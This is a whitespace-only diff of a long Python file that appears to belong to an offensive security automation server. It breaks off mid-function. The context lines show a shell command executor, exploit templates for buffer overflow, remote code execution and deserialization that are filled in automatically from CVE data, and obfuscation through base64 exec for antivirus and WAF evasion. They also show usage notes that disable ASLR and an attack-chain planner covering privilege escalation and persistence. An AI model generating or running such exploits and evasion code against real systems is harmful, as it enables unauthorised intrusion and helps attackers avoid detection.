SUMMARY REPORT โ•‘ @@ -5944,7 +5944,7 @@ class CVEIntelligenceManager: {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['WARNING']}๐Ÿ› ๏ธ Tools Used:{ModernVisualEngine.COLORS['RESET']} {len(tools_used)} tools {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['HACKER_RED']}๐Ÿ”ฅ Critical:{ModernVisualEngine.COLORS['RESET']} {critical_vulns} vulnerabilities -{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ERROR']}โš ๏ธ High:{ModernVisualEngine.COLORS['RESET']} {high_vulns} vulnerabilities +{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ERROR']}โš ๏ธ High:{ModernVisualEngine.COLORS['RESET']} {high_vulns} vulnerabilities {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['MATRIX_GREEN']}๐Ÿ“ˆ Total Found:{ModernVisualEngine.COLORS['RESET']} {total_vulns} vulnerabilities {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['ELECTRIC_PURPLE']}๐Ÿš€ Tools:{ModernVisualEngine.COLORS['RESET']} {', '.join(tools_used[:5])}{'...' if len(tools_used) > 5 else ''} @@ -5955,7 +5955,7 @@ class CVEIntelligenceManager: # Configure enhanced logging with colors class ColoredFormatter(logging.Formatter): """Custom formatter with colors and emojis""" - + COLORS = { 'DEBUG': ModernVisualEngine.COLORS['DEBUG'], 'INFO': ModernVisualEngine.COLORS['SUCCESS'], @@ -5963,7 +5963,7 @@ class ColoredFormatter(logging.Formatter): 'ERROR': ModernVisualEngine.COLORS['ERROR'], 'CRITICAL': ModernVisualEngine.COLORS['CRITICAL'] } - + EMOJIS = { 'DEBUG': '๐Ÿ”', 'INFO': 'โœ…', @@ -5971,11 +5971,11 @@ class ColoredFormatter(logging.Formatter): 'ERROR': 'โŒ', 'CRITICAL': '๐Ÿ”ฅ' } - + def format(self, record): emoji = self.EMOJIS.get(record.levelname, '๐Ÿ“') color = self.COLORS.get(record.levelname, ModernVisualEngine.COLORS['BRIGHT_WHITE']) - + # Add color and emoji to the message record.msg = f"{color}{emoji} {record.msg}{ModernVisualEngine.COLORS['RESET']}" return super().format(record) @@ -5985,11 +5985,11 @@ def setup_logging(): """Setup enhanced logging with colors and formatting""" logger = logging.getLogger() logger.setLevel(logging.INFO) - + # Clear existing handlers for handler in logger.handlers[:]: logger.removeHandler(handler) - + # Console handler with colors console_handler = logging.StreamHandler(sys.stdout) console_handler.setFormatter(ColoredFormatter( @@ -5997,7 +5997,7 @@ def setup_logging(): datefmt="%Y-%m-%d %H:%M:%S" )) logger.addHandler(console_handler) - + return logger # Configuration (using existing API_PORT from top of file) @@ -6008,26 +6008,26 @@ CACHE_TTL = 3600 # 1 hour class HexStrikeCache: """Advanced caching system for command results""" - + def __init__(self, max_size: int = CACHE_SIZE, ttl: int = CACHE_TTL): self.cache = OrderedDict() self.max_size = max_size self.ttl = ttl self.stats = {"hits": 0, "misses": 0, "evictions": 0} - + def _generate_key(self, command: str, params: Dict[str, Any]) -> str: """Generate cache key from command and parameters""" key_data = f"{command}:{json.dumps(params, sort_keys=True)}" return hashlib.md5(key_data.encode()).hexdigest() - + def _is_expired(self, timestamp: float) -> bool: """Check if cache entry is expired""" return time.time() - timestamp > self.ttl - + def get(self, command: str, params: Dict[str, Any]) -> Optional[Dict[str, Any]]: """Get cached result if available and not expired""" key = self._generate_key(command, params) - + if key in self.cache: timestamp, data = self.cache[key] if not self._is_expired(timestamp): @@ -6039,29 +6039,29 @@ class HexStrikeCache: else: # Remove expired entry del self.cache[key] - + self.stats["misses"] += 1 logger.info(f"๐Ÿ” Cache MISS for command: {command}") return None - + def set(self, command: str, params: Dict[str, Any], result: Dict[str, Any]): """Store result in cache""" key = self._generate_key(command, params) - + # Remove oldest entries if cache is full while len(self.cache) >= self.max_size: oldest_key = next(iter(self.cache)) del self.cache[oldest_key] self.stats["evictions"] += 1 - + self.cache[key] = (time.time(), result) logger.info(f"๐Ÿ’พ Cached result for command: {command}") - + def get_stats(self) -> Dict[str, Any]: """Get cache statistics""" total_requests = self.stats["hits"] + self.stats["misses"] hit_rate = (self.stats["hits"] / total_requests * 100) if total_requests > 0 else 0 - + return { "size": len(self.cache), "max_size": self.max_size, @@ -6076,7 +6076,7 @@ cache = HexStrikeCache() class TelemetryCollector: """Collect and manage system telemetry""" - + def __init__(self): self.stats = { "commands_executed": 0, @@ -6085,7 +6085,7 @@ class TelemetryCollector: "total_execution_time": 0.0, "start_time": time.time() } - + def record_execution(self, success: bool, execution_time: float): """Record command execution statistics""" self.stats["commands_executed"] += 1 @@ -6094,7 +6094,7 @@ class TelemetryCollector: else: self.stats["failed_commands"] += 1 self.stats["total_execution_time"] += execution_time - + def get_system_metrics(self) -> Dict[str, Any]: """Get current system metrics""" return { @@ -6103,13 +6103,13 @@ class TelemetryCollector: "disk_usage": psutil.disk_usage('/').percent, "network_io": psutil.net_io_counters()._asdict() if psutil.net_io_counters() else {} } - + def get_stats(self) -> Dict[str, Any]: """Get telemetry statistics""" uptime = time.time() - self.stats["start_time"] success_rate = (self.stats["successful_commands"] / self.stats["commands_executed"] * 100) if self.stats["commands_executed"] > 0 else 0 avg_execution_time = (self.stats["total_execution_time"] / self.stats["commands_executed"]) if self.stats["commands_executed"] > 0 else 0 - + return { "uptime_seconds": uptime, "commands_executed": self.stats["commands_executed"], @@ -6123,7 +6123,7 @@ telemetry = TelemetryCollector() class EnhancedCommandExecutor: """Enhanced command executor with caching, progress tracking, and better output handling""" - + def __init__(self, command: str, timeout: int = COMMAND_TIMEOUT): self.command = command self.timeout = timeout @@ -6136,7 +6136,7 @@ class EnhancedCommandExecutor: self.timed_out = False self.start_time = None self.end_time = None - + def _read_stdout(self): """Thread function to continuously read and display stdout""" try: @@ -6147,7 +6147,7 @@ class EnhancedCommandExecutor: logger.info(f"๐Ÿ“ค STDOUT: {line.strip()}") except Exception as e: logger.error(f"Error reading stdout: {e}") - + def _read_stderr(self): """Thread function to continuously read and display stderr""" try: @@ -6158,7 +6158,7 @@ class EnhancedCommandExecutor: logger.warning(f"๐Ÿ“ฅ STDERR: {line.strip()}") except Exception as e: logger.error(f"Error reading stderr: {e}") - + def _show_progress(self, duration: float): """Show enhanced progress indication for long-running commands""" if duration > 2: # Show progress for commands taking more than 2 seconds @@ -6168,20 +6168,20 @@ class EnhancedCommandExecutor: while self.process and self.process.poll() is None: elapsed = time.time() - start char = progress_chars[i % len(progress_chars)] - + # Calculate progress percentage (rough estimate) progress_percent = min((elapsed / self.timeout) * 100, 99.9) progress_fraction = progress_percent / 100 - + # Calculate ETA eta = 0 if progress_percent > 5: # Only show ETA after 5% progress eta = ((elapsed / progress_percent) * 100) - elapsed - + # Calculate speed bytes_processed = len(self.stdout_data) + len(self.stderr_data) speed = f"{bytes_processed/elapsed:.0f} B/s" if elapsed > 0 else "0 B/s" - + # Update process manager with progress ProcessManager.update_process_progress( self.process.pid, @@ -6189,30 +6189,30 @@ class EnhancedCommandExecutor: f"Running for {elapsed:.1f}s", bytes_processed ) - + # Create beautiful progress bar using ModernVisualEngine progress_bar = ModernVisualEngine.render_progress_bar( - progress_fraction, - width=30, + progress_fraction, + width=30, style='cyber', label=f"โšก PROGRESS {char}", eta=eta, speed=speed ) - + logger.info(f"{progress_bar} | {elapsed:.1f}s | PID: {self.process.pid}") time.sleep(0.8) i += 1 if elapsed > self.timeout: break - + def execute(self) -> Dict[str, Any]: """Execute the command with enhanced monitoring and output""" self.start_time = time.time() - + logger.info(f"๐Ÿš€ EXECUTING: {self.command}") logger.info(f"โฑ๏ธ TIMEOUT: {self.timeout}s | PID: Starting...") - + try: self.process = subprocess.Popen( self.command, @@ -6222,13 +6222,13 @@ class EnhancedCommandExecutor: text=True, bufsize=1 ) - + pid = self.process.pid logger.info(f"๐Ÿ†” PROCESS: PID {pid} started") - + # Register process with ProcessManager (v5.0 enhancement) ProcessManager.register_process(pid, self.command, self.process) - + # Start threads to read output continuously self.stdout_thread = threading.Thread(target=self._read_stdout) self.stderr_thread = threading.Thread(target=self._read_stderr) @@ -6236,41 +6236,41 @@ class EnhancedCommandExecutor: self.stderr_thread.daemon = True self.stdout_thread.start() self.stderr_thread.start() - + # Start progress tracking in a separate thread progress_thread = threading.Thread(target=self._show_progress, args=(self.timeout,)) progress_thread.daemon = True progress_thread.start() - + # Wait for the process to complete or timeout try: self.return_code = self.process.wait(timeout=self.timeout) self.end_time = time.time() - + # Process completed, join the threads self.stdout_thread.join(timeout=1) self.stderr_thread.join(timeout=1) - + execution_time = self.end_time - self.start_time - + # Cleanup process from registry (v5.0 enhancement) ProcessManager.cleanup_process(pid) - + if self.return_code == 0: logger.info(f"โœ… SUCCESS: Command completed | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(True, execution_time) else: logger.warning(f"โš ๏ธ WARNING: Command completed with errors | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(False, execution_time) - + except subprocess.TimeoutExpired: self.end_time = time.time() execution_time = self.end_time - self.start_time - + # Process timed out but we might have partial results self.timed_out = True logger.warning(f"โฐ TIMEOUT: Command timed out after {self.timeout}s | Terminating PID {self.process.pid}") - + # Try to terminate gracefully first self.process.terminate() try: @@ -6279,22 +6279,22 @@ class EnhancedCommandExecutor: # Force kill if it doesn't terminate logger.error(f"๐Ÿ”ช FORCE KILL: Process {self.process.pid} not responding to termination") self.process.kill() - + self.return_code = -1 telemetry.record_execution(False, execution_time) - + # Always consider it a success if we have output, even with timeout success = True if self.timed_out and (self.stdout_data or self.stderr_data) else (self.return_code == 0) - + # Log enhanced final results with summary using ModernVisualEngine output_size = len(self.stdout_data) + len(self.stderr_data) execution_time = self.end_time - self.start_time if self.end_time else 0 - + # Create status summary status_icon = "โœ…" if success else "โŒ" status_color = ModernVisualEngine.COLORS['MATRIX_GREEN'] if success else ModernVisualEngine.COLORS['HACKER_RED'] timeout_status = f" {ModernVisualEngine.COLORS['WARNING']}[TIMEOUT]{ModernVisualEngine.COLORS['RESET']}" if self.timed_out else "" - + # Create beautiful results summary results_summary = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -6307,12 +6307,12 @@ class EnhancedCommandExecutor: {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {status_color}๐Ÿ“ˆ Status:{ModernVisualEngine.COLORS['RESET']} {'SUCCESS' if success else 'FAILED'} | Cached: Yes {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + # Log the beautiful summary for line in results_summary.strip().split('\n'): if line.strip(): logger.info(line) - + return { "stdout": self.stdout_data, "stderr": self.stderr_data, @@ -6323,15 +6323,15 @@ class EnhancedCommandExecutor: "execution_time": self.end_time - self.start_time if self.end_time else 0, "timestamp": datetime.now().isoformat() } - + except Exception as e: self.end_time = time.time() execution_time = self.end_time - self.start_time if self.start_time else 0 - + logger.error(f"๐Ÿ’ฅ ERROR: Command execution failed: {str(e)}") logger.error(f"๐Ÿ” TRACEBACK: {traceback.format_exc()}") telemetry.record_execution(False, execution_time) - + return { "stdout": self.stdout_data, "stderr": f"Error executing command: {str(e)}\n{self.stderr_data}", @@ -6350,24 +6350,24 @@ class EnhancedCommandExecutor: # ============================================================================ # AI-POWERED EXPLOIT GENERATION SYSTEM (v6.0 ENHANCEMENT) # ============================================================================ -# +# # This section contains advanced AI-powered exploit generation capabilities # for automated vulnerability exploitation and proof-of-concept development. -# +# # Features: # - Automated exploit template generation from CVE data # - Multi-architecture support (x86, x64, ARM) # - Evasion technique integration # - Custom payload generation # - Exploit effectiveness scoring -# +# # ============================================================================ class AIExploitGenerator: """AI-powered exploit development and enhancement system""" - + def __init__(self): # Extend existing payload templates self.exploit_templates = { @@ -6384,15 +6384,15 @@ def create_exploit(): # Vulnerability details from {cve_id} target_ip = "{target_ip}" target_port = {target_port} - + # Buffer overflow payload padding = "A" * {offset} eip_control = struct.pack(" ") sys.exit(1) - + result = exploit_rce(sys.argv[1], sys.argv[2]) if result: print("Exploit successful!") @@ -6482,43 +6482,43 @@ def create_malicious_payload(command): def send_exploit(target_url, command): payload = create_malicious_payload(command) - + data = {{ "{parameter_name}": payload }} - + response = requests.post(target_url, data=data) return response.text """ } - + self.evasion_techniques = { "encoding": ["url", "base64", "hex", "unicode"], "obfuscation": ["variable_renaming", "string_splitting", "comment_injection"], "av_evasion": ["encryption", "packing", "metamorphism"], "waf_bypass": ["case_variation", "parameter_pollution", "header_manipulation"] } - + def generate_exploit_from_cve(self, cve_data, target_info): """Generate working exploit from CVE data""" try: cve_id = cve_data.get("cve_id", "") description = cve_data.get("description", "").lower() - + # Determine vulnerability type vuln_type = self._classify_vulnerability(description) exploit_template = self._select_template(vuln_type, target_info) - + # Generate exploit parameters exploit_params = self._generate_exploit_parameters(cve_data, target_info, vuln_type) - + # Fill template with parameters exploit_code = exploit_template.format(**exploit_params) - + # Apply evasion techniques if requested if target_info.get("evasion_level", "none") != "none": exploit_code = self._apply_evasion_techniques(exploit_code, target_info) - + return { "success": True, "cve_id": cve_id, @@ -6528,11 +6528,11 @@ def send_exploit(target_url, command): "instructions": self._generate_usage_instructions(vuln_type, exploit_params), "evasion_applied": target_info.get("evasion_level", "none") } - + except Exception as e: logger.error(f"Error generating exploit: {str(e)}") return {"success": False, "error": str(e)} - + def _classify_vulnerability(self, description): """Classify vulnerability type from description""" if any(keyword in description for keyword in ["buffer overflow", "heap overflow", "stack overflow"]): @@ -6547,7 +6547,7 @@ def send_exploit(target_url, command): return "xss" else: return "generic" - + def _select_template(self, vuln_type, target_info): """Select appropriate exploit template""" if vuln_type == "buffer_overflow": @@ -6558,7 +6558,7 @@ def send_exploit(target_url, command): return self.exploit_templates[vuln_type] else: return "# Generic exploit template for {cve_id}\n# Manual development required" - + def _generate_exploit_parameters(self, cve_data, target_info, vuln_type): """Generate parameters for exploit template""" params = { @@ -6568,7 +6568,7 @@ def send_exploit(target_url, command): "target_port": target_info.get("target_port", 80), "command": target_info.get("command", "id"), } - + if vuln_type == "buffer_overflow": params.update({ "offset": target_info.get("offset", 268), @@ -6584,13 +6584,13 @@ def send_exploit(target_url, command): "injection_payload": target_info.get("injection_payload", '{"cmd": command}'), "parameter_name": target_info.get("parameter_name", "data") }) - + return params - + def _apply_evasion_techniques(self, exploit_code, target_info): """Apply evasion techniques to exploit code""" evasion_level = target_info.get("evasion_level", "basic") - + if evasion_level == "basic": # Simple string obfuscation exploit_code = exploit_code.replace('"', "'") @@ -6598,9 +6598,9 @@ def send_exploit(target_url, command): elif evasion_level == "advanced": # Advanced obfuscation exploit_code = self._advanced_obfuscation(exploit_code) - + return exploit_code - + def _advanced_obfuscation(self, code): """Apply advanced obfuscation techniques""" # This is a simplified version - real implementation would be more sophisticated @@ -6610,7 +6610,7 @@ import base64 exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) """ return obfuscated - + def _generate_usage_instructions(self, vuln_type, params): """Generate usage instructions for the exploit""" instructions = [ @@ -6626,7 +6626,7 @@ exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) "## Testing:", f"python3 exploit.py {params.get('target_ip', '')} {params.get('target_port', '')}" ] - + if vuln_type == "buffer_overflow": instructions.extend([ "", @@ -6636,12 +6636,12 @@ exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) "- Verify addresses match target binary", "- Disable ASLR for testing: echo 0 > /proc/sys/kernel/randomize_va_space" ]) - + return "\n".join(instructions) class VulnerabilityCorrelator: """Correlate vulnerabilities for multi-stage attack chain discovery""" - + def __init__(self): self.attack_patterns = { "privilege_escalation": ["local", "kernel", "suid", "sudo"], @@ -6650,28 +6650,28 @@ class VulnerabilityCorrelator: "lateral_movement": ["smb", "wmi", "ssh", "rdp"], "data_exfiltration": ["file", "database", "memory", "network"] } - + self.software_relationships = { "windows": ["iis", "office", "exchange", "sharepoint"], "linux": ["apache", "nginx", "mysql", "postgresql"], "web": ["php", "nodejs", "python", "java"], "database": ["mysql", "postgresql", "oracle", "mssql"] } - + def find_attack_chains(self, target_software, max_depth=3): """Find multi-vulnerability attack chains""" try: # This is a simplified implementation # Real version would use graph algorithms and ML - + chains = [] - + # Example attack chain discovery logic base_software = target_software.lower() - + # Find initial access vulnerabilities initial_vulns = self._find_vulnerabilities_by_pattern(base_software, "remote_execution") - + for initial_vuln in initial_vulns[:3]: # Limit for demo chain = { "chain_id": f"chain_{len(chains) + 1}", @@ -6687,7 +6687,7 @@ class VulnerabilityCorrelator: "overall_probability": 0.75, "complexity": "MEDIUM" } - + # Find privilege escalation priv_esc_vulns = self._find_vulnerabilities_by_pattern(base_software, "privilege_escalation") if priv_esc_vulns: @@ -6698,7 +6698,7 @@ class VulnerabilityCorrelator: "success_probability": 0.60 }) chain["overall_probability"] *= 0.60 - + # Find persistence persistence_vulns = self._find_vulnerabilities_by_pattern(base_software, "persistence") if persistence_vulns and len(chain["stages"]) < max_depth: @@ -6709,9 +6709,9 @@ class VulnerabilityCorrelator: "success_probability": 0.80 }) chain["overall_probability"] *= 0.80 - + chains.append(chain) - + return { "success": True, "target_software": target_software, @@ -6719,11 +6719,11 @@ class VulnerabilityCorrelator: "attack_chains": chains, "recommendation": self._generate_chain_recommendations(chains) } - + except Exception as e: logger.error(f"Error finding attack chains: {str(e)}") return {"success": False, "error": str(e)} - + def _find_vulnerabilities_by_pattern(self, software, pattern_type): """Find vulnerabilities matching attack pattern""" # Simplified mock data - real implementation would query CVE database @@ -6741,14 +6741,14 @@ class VulnerabilityCorrelator: "exploitability": "MEDIUM" } ] - + return mock_vulnerabilities - + def _generate_chain_recommendations(self, chains): """Generate recommendations for attack chains""" if not chains: return "No viable attack chains found for target" - + recommendations = [ f"Found {len(chains)} potential attack chains", f"Highest probability chain: {max(chains, key=lambda x: x['overall_probability'])['overall_probability']:.2%}", @@ -6757,7 +6757,7 @@ class VulnerabilityCorrelator: "- Prepare fallback methods for each stage", "- Consider detection evasion at each stage" ] - + return "\n".join(recommendations) # Global intelligence managers @@ -6768,60 +6768,60 @@ vulnerability_correlator = VulnerabilityCorrelator() def execute_command(command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute a shell command with enhanced features - + Args: command: The command to execute use_cache: Whether to use caching for this command - + Returns: A dictionary containing the stdout, stderr, return code, and metadata """ - + # Check cache first if use_cache: cached_result = cache.get(command, {}) if cached_result: return cached_result - + # Execute command executor = EnhancedCommandExecutor(command) result = executor.execute() - + # Cache successful results if use_cache and result.get("success", False): cache.set(command, {}, result) - + return result -def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict[str, Any] = None, +def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict[str, Any] = None, use_cache: bool = True, max_attempts: int = 3) -> Dict[str, Any]: """ Execute a command with intelligent error handling and recovery - + Args: tool_name: Name of the tool being executed command: The command to execute parameters: Tool parameters for context use_cache: Whether to use caching max_attempts: Maximum number of recovery attempts - + Returns: A dictionary containing execution results with recovery information """ if parameters is None: parameters = {} - + attempt_count = 0 last_error = None recovery_history = [] - + while attempt_count < max_attempts: attempt_count += 1 - + try: # Execute the command result = execute_command(command, use_cache) - + # Check if execution was successful if result.get("success", False): # Add recovery information to successful result @@ -6831,11 +6831,11 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "recovery_history": recovery_history } return result - + # Command failed, determine if we should attempt recovery error_message = result.get("stderr", "Unknown error") exception = Exception(error_message) - + # Create context for error handler context = { "target": parameters.get("target", "unknown"), @@ -6843,7 +6843,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "attempt_count": attempt_count, "command": command } - + # Get recovery strategy from error handler recovery_strategy = error_handler.handle_tool_failure(tool_name, exception, context) recovery_history.append({ @@ -6852,35 +6852,35 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "recovery_action": recovery_strategy.action.value, "timestamp": datetime.now().isoformat() }) - + # Apply recovery strategy if recovery_strategy.action == RecoveryAction.RETRY_WITH_BACKOFF: delay = recovery_strategy.parameters.get("initial_delay", 5) backoff = recovery_strategy.parameters.get("max_delay", 60) actual_delay = min(delay * (recovery_strategy.backoff_multiplier ** (attempt_count - 1)), backoff) - + retry_info = f'Retrying in {actual_delay}s (attempt {attempt_count}/{max_attempts})' logger.info(f"{ModernVisualEngine.format_tool_status(tool_name, 'RECOVERY', retry_info)}") time.sleep(actual_delay) continue - + elif recovery_strategy.action == RecoveryAction.RETRY_WITH_REDUCED_SCOPE: # Adjust parameters to reduce scope adjusted_params = error_handler.auto_adjust_parameters( - tool_name, + tool_name, error_handler.classify_error(error_message, exception), parameters ) - + # Rebuild command with adjusted parameters command = _rebuild_command_with_params(tool_name, command, adjusted_params) logger.info(f"๐Ÿ”ง Retrying {tool_name} with reduced scope") continue - + elif recovery_strategy.action == RecoveryAction.SWITCH_TO_ALTERNATIVE_TOOL: # Get alternative tool alternative_tool = error_handler.get_alternative_tool(tool_name, recovery_strategy.parameters) - + if alternative_tool: switch_info = f'Switching to alternative: {alternative_tool}' logger.info(f"{ModernVisualEngine.format_tool_status(tool_name, 'RECOVERY', switch_info)}") @@ -6895,17 +6895,17 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict return result else: logger.warning(f"โš ๏ธ No alternative tool found for {tool_name}") - + elif recovery_strategy.action == RecoveryAction.ADJUST_PARAMETERS: # Adjust parameters based on error type error_type = error_handler.classify_error(error_message, exception) adjusted_params = error_handler.auto_adjust_parameters(tool_name, error_type, parameters) - + # Rebuild command with adjusted parameters command = _rebuild_command_with_params(tool_name, command, adjusted_params) logger.info(f"๐Ÿ”ง Retrying {tool_name} with adjusted parameters") continue - + elif recovery_strategy.action == RecoveryAction.ESCALATE_TO_HUMAN: # Create error context for escalation error_context = ErrorContext( @@ -6919,12 +6919,12 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict stack_trace="", system_resources=error_handler._get_system_resources() ) - + escalation_data = error_handler.escalate_to_human( - error_context, + error_context, recovery_strategy.parameters.get("urgency", "medium") ) - + result["human_escalation"] = escalation_data result["recovery_info"] = { "attempts_made": attempt_count, @@ -6933,16 +6933,16 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "human_escalation" } return result - + elif recovery_strategy.action == RecoveryAction.GRACEFUL_DEGRADATION: # Apply graceful degradation operation = _determine_operation_type(tool_name) degraded_result = degradation_manager.handle_partial_failure( - operation, - result, + operation, + result, [tool_name] ) - + degraded_result["recovery_info"] = { "attempts_made": attempt_count, "recovery_applied": True, @@ -6950,7 +6950,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "graceful_degradation" } return degraded_result - + elif recovery_strategy.action == RecoveryAction.ABORT_OPERATION: logger.error(f"๐Ÿ›‘ Aborting {tool_name} operation after {attempt_count} attempts") result["recovery_info"] = { @@ -6960,13 +6960,13 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "operation_aborted" } return result - + last_error = exception - + except Exception as e: last_error = e logger.error(f"๐Ÿ’ฅ Unexpected error in recovery attempt {attempt_count}: {str(e)}") - + # If this is the last attempt, escalate to human if attempt_count >= max_attempts: error_context = ErrorContext( @@ -6980,9 +6980,9 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict stack_trace=traceback.format_exc(), system_resources=error_handler._get_system_resources() ) - + escalation_data = error_handler.escalate_to_human(error_context, "high") - + return { "success": False, "error": str(e), @@ -6994,7 +6994,7 @@ def execute_command_with_recovery(tool_name: str, command: str, parameters: Dict "final_action": "human_escalation_after_failure" } } - + # All attempts exhausted logger.error(f"๐Ÿšซ All recovery attempts exhausted for {tool_name}") return { @@ -7013,7 +7013,7 @@ def _rebuild_command_with_params(tool_name: str, original_command: str, new_para # This is a simplified implementation - in practice, you'd need tool-specific logic # For now, we'll just append new parameters additional_args = [] - + for key, value in new_params.items(): if key == "timeout" and tool_name in ["nmap", "gobuster", "nuclei"]: additional_args.append(f"--timeout {value}") @@ -7027,17 +7027,17 @@ def _rebuild_command_with_params(tool_name: str, original_command: str, new_para additional_args.append(f"-c {value}") elif key == "rate-limit" and tool_name == "nuclei": additional_args.append(f"-rl {value}") - + if additional_args: return f"{original_command} {' '.join(additional_args)}" - + return original_command def _determine_operation_type(tool_name: str) -> str: """Determine operation type based on tool name""" operation_mapping = { "nmap": "network_discovery", - "rustscan": "network_discovery", + "rustscan": "network_discovery", "masscan": "network_discovery", "gobuster": "web_discovery", "feroxbuster": "web_discovery", @@ -7053,85 +7053,85 @@ def _determine_operation_type(tool_name: str) -> str: "paramspider": "parameter_discovery", "x8": "parameter_discovery" } - + return operation_mapping.get(tool_name, "unknown_operation") # File Operations Manager class FileOperationsManager: """Handle file operations with security and validation""" - + def __init__(self, base_dir: str = "/tmp/hexstrike_files"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) self.max_file_size = 100 * 1024 * 1024 # 100MB - + def create_file(self, filename: str, content: str, binary: bool = False) -> Dict[str, Any]: """Create a file with the specified content""" try: file_path = self.base_dir / filename file_path.parent.mkdir(parents=True, exist_ok=True) - + if len(content.encode()) > self.max_file_size: return {"success": False, "error": f"File size exceeds {self.max_file_size} bytes"} - + mode = "wb" if binary else "w" with open(file_path, mode) as f: if binary: f.write(content.encode() if isinstance(content, str) else content) else: f.write(content) - + logger.info(f"๐Ÿ“„ Created file: {filename} ({len(content)} bytes)") return {"success": True, "path": str(file_path), "size": len(content)} - + except Exception as e: logger.error(f"โŒ Error creating file {filename}: {e}") return {"success": False, "error": str(e)} - + def modify_file(self, filename: str, content: str, append: bool = False) -> Dict[str, Any]: """Modify an existing file""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} - + mode = "a" if append else "w" with open(file_path, mode) as f: f.write(content) - + logger.info(f"โœ๏ธ Modified file: {filename}") return {"success": True, "path": str(file_path)} - + except Exception as e: logger.error(f"โŒ Error modifying file {filename}: {e}") return {"success": False, "error": str(e)} - + def delete_file(self, filename: str) -> Dict[str, Any]: """Delete a file or directory""" try: file_path = self.base_dir / filename if not file_path.exists(): return {"success": False, "error": "File does not exist"} - + if file_path.is_dir(): shutil.rmtree(file_path) else: file_path.unlink() - + logger.info(f"๐Ÿ—‘๏ธ Deleted: {filename}") return {"success": True} - + except Exception as e: logger.error(f"โŒ Error deleting {filename}: {e}") return {"success": False, "error": str(e)} - + def list_files(self, directory: str = ".") -> 